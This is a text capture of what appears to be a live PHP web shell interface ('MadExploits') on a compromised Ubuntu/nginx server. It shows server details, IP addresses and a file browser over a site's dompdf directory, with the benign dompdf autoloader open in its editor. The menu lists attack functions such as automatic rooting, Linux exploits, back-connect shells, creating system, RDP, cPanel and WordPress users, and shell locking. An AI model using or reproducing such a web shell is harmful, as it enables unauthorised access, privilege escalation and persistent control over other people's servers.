Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
dompdf /
dompdf /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
CONTRIBUTING.md
3.02
KB
-rw-r--r--
LICENSE.LGPL
24.23
KB
-rw-r--r--
README.md
6.67
KB
-rw-r--r--
VERSION
10
B
-rw-r--r--
autoload.inc.php
795
B
-rw-r--r--
composer.json
1.08
KB
-rw-r--r--
phpcs.xml
4.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload.inc.php
<?php /** * @package dompdf * @link http://dompdf.github.com/ * @author Benj Carson <benjcarson@digitaljunkies.ca> * @author Fabien Ménager <fabien.menager@gmail.com> * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License */ /** * Dompdf autoload function * * If you have an existing autoload function, add a call to this function * from your existing __autoload() implementation. * * @param string $class */ require_once __DIR__ . '/lib/html5lib/Parser.php'; require_once __DIR__ . '/lib/php-font-lib/src/FontLib/Autoloader.php'; require_once __DIR__ . '/lib/php-svg-lib/src/autoload.php'; /* * New PHP 5.3.0 namespaced autoloader */ require_once __DIR__ . '/src/Autoloader.php'; Dompdf\Autoloader::register();
Close